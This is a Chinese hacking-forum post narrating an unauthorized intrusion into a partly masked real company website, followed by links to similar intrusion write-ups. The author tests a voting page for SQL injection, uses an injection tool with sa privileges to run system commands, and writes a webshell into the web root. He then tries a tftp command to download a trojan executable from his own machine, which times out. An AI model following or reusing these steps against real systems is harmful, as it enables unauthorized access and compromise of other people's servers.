|
[组图]Sa权限艰难入侵 拿下服务器
打开他们的网站http://www.sx***.com
,一下就傻了,主页上面的链接全是http://www.sx***.com/xyxw/20051207/2473.asp这样的,没有办法注入,我就不信这个邪,仔细往下找,终于,功夫不负有心人,找到一个投票页面http://www.sx***.com/vote_result.asp?id=26,马上在后面加上一个’(事先要在IE的工具—internet选项—高级中将显示友好的http错误信息前面的对钩取掉)返回了出错页面
再加上 and 1=1正常返回, and 1=2返回错误,确定有sql注入漏洞了,并且知道了是sql数据库,马上将它复制到“狂注幽灵”中,检测出来了
呵呵,还是sa权限的呢,看到这里我松了一口气,觉得应该很简单了,我用net start查看开放的服务,显示Terminal Services是启动的,可是用netstat –an找不到3389,可能是改了,又用ssport扫描了一下对外开放的端口只有这几个
试着用远程桌面连接了一下,都不是,有防火墙或做了端口过滤,连1433也过滤了,即使找到sa密码也没什么用,我换了一个思路。
看看数据服务器和web服务器是不是一个,如果是的话上传个webshell,再用webshell上传反弹木马,因为我们有执行权限,这样即使他做了端口过滤也没关系,马上在“狂注幽灵”中执行ping 我的ip,防火墙马上提示有人ping,并且ip和我ping www.sx***.com得到的ip是一样的,看来在一个机子上,接下来找web目录,没费什么什么劲就找到了D:\ECMS\webhome\,用啊D的工具写了一个海洋的s端上去,然后用c端连接,却显示该页无法找到,用type命令查看,郁闷了,竟然是这样的
一句话写了四遍,这是由于SQL编码问题导致的,既然可以执行命令,我在本地架了一个tftp服务器,然后用tftp –I 我的ip abc.exe,却显示连接超时,我将超时时间设置的大一点也还是这样,真郁闷,快上课了,先放你一马!
| 一次通过 Oracle8i 入侵系统之旅 | 03-21 |
| SA权限下的思路变通 | 03-18 |
| 有防火墙的网站整个入侵过程 | 01-21 |
| 绕过Xplog70.dll玩入侵 | 01-14 |
| 一步一步的入侵----only for you | 01-09 |
| 入侵中快速获得Web根目录的技巧 | 01-09 |
| 记一次对RedHat Linux系统的安全 | 01-08 |
| 介绍几个小工具和入侵的技法(2) | 01-08 |
| 有防火墙的网站整个入侵过程 | 01-04 |
| 拐弯入侵虚拟主机 | 01-04 |
| 由一次入侵实例看虚拟主机系统的 | 01-02 |
| 解读IDS入侵检测系统术语 | 01-02 |
您现在的位置: